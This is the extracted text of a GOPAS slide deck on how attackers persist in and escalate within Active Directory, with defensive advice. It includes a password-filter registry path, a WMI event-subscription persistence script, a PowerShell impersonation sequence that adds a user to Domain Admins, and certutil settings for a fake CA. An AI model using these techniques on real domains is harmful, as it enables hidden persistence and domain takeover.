What would a real hacker do to your AD

GOPAS: info@gopas,cz | www.gopas.cz | www.facebook.com/P.S.GOPAS

Ing. Ondřej Ševeček | GOPAS a.s. |

MCM: Directory Services | MVP: Enterprise Security | Certified Ethical Hacker |

ondrej@sevecek.com | www.sevecek.com |

Intro

What happens when they take one of your DCs? You are doomed

• must reinstall the whole forest from scratch• may be able to restore the whole forest from last clean

backup provided you are sure the intrusion will not happen again

Why do I show these things

Secure machines physically Do not use domain admin credentials on insecure

machines Separate administrative accounts Never use admin accounts to access services Stress on strong passwords or rather use smart cards

Agenda

Physical DC security Password filters Hidden accounts Hidden scheduled tasks Forest is a security boundary Exploiting Kerberos delegation Logon without passwords

Physical DC security

Having physical access means you have full power over data, settings and binaries• partially substitute physical security with BitLocker and TPM• use RODCs at insecure locations

Hardware keyloggers Reboot and offline modifications

Password filters

Password change/reset after an attack means nothing

HKYE_LOCAL_MACHINESystem

CurrentControlSetControl

LSANotificationPackages = MULTI_SZ

Hidden accounts

You are never able to do a 100% security audit after an attack

Not even Domain Admins can see everything

Hidden scheduled tasks

You are never able to do a 100% security audit after an attack

Not even the prominent audit tools know everything• root\subscription• ActiveScriptEventConsumer

Name = ScriptEngine = VBScript ScriptText =

set fso = CreateObject("Scripting.FileSystemObject") : fileName = "c:\showit" & "-" & Year(Now) & "-" & Month(Now) & "-" & Day(Now) & "-" & Hour(Now) & "-" & Minute(Now) & "-" & Second(Now) & ".txt" : set newFile = fso.CreateTextFile(fileName) : newFile.WriteLine("I will be here for ever!") : newFile.Close()

Hidden scheduled tasks

You are never able to do a 100% security audit after an attack

… continuing …• __EventFilter

Name = QueryLanguage = WQL EventNamespace = root\cimv2 Query =

SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA "Win32_LocalTime" AND TargetInstance.Second = 9

Second, Minute, Hour, DayOfWeek, Month, Quarter, Year, WeekInMonth

Forest is a security boundary

Domain Admins from any domain of a forest are also Domain Admins in any other domain as well

Site level GPOs No SID filtering inside forest NTAuth CAs Stealing KDC passwords (krbtgt account) …

DE.gopas.virtualDE.

gopas.virtual

Subdomain scenario

gopas.virtual

CZ.gopas.virtual

DE.gopas.virtual

Kerberos delegation with protocol transition

Password is not the only means how to log on to network services• no credentials necessary at all

Trust this computer to specified services only• Any authentication protocol

Kerberos delegation

ClientApp

Server

DB

LDAP

FS

Kamil

Kamil

App Server

DB

LDAP

FS

Kamil

Kerberos delegation with protocol transition

Delegation with PowerShell

Adjust-Privilege 7 $true

$winId = New-Object System.Security.Principal.WindowsIdentity 'kamil@gopas.cz'

[Security.Principal.WindowsIdentity]::GetCurrent()

$winId.Impersonate()

[Security.Principal.WindowsIdentity]::GetCurrent()

$domainAdmins = [ADSI] 'LDAP://CN=Domain Admins,CN=Users,DC=gopas,DC=virtual'$domainAdmins.Add('LDAP://CN=Leos,OU=People,OU=Company,DC=gopas,DC=virtual')

Smart card logon

Password is not the only means how to log on to computers

NTAuth CA• forest wide trust• do not need to consult AD or touch LDAP at all

Notes• ldap:///CN=GOPAS%20Root%20Online

%20CA,CN=DC1,CN=CDP,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=gopas,DC=virtual?certificateRevocationList?base?objectClass=cRLDistributionPoint

Fake Microsoft CA

Something must always be trusted Root CA

• CN=Microsoft Root Authority,OU=Microsoft Corporation,OU=Copyright (c) 1997 Microsoft Corp.

Code signing cert• CN=Microsoft Corporation,OU=MOPR,O=Microsoft

Corporation,L=Redmond,S=Washington,C=US

Fake Microsoft CA

Longer validity for issued certificates• CERTUTIL -setreg CA\ValidityPeriodUnits 5

No certificate template name extension• CERTUTIL -setreg policy\DisableExtensionList

+1.3.6.1.4.1.311.21.7

No CRL paths into issued certificates• certutil -setreg DBFlags

+DBFLAGS_ENABLEVOLATILEREQUESTS

NASHLEDANOU

GOPAS: info@gopas,cz | www.gopas.cz | www.facebook.com/P.S.GOPAS

na kurzech v počítačové škole GOPAS, a.s.

GOC171 - Active Directory Troubleshooting

GOC172 - Kerberos Troubleshooting

GOC173 - Enterprise PKI Deployment

GOC175 - Administering Security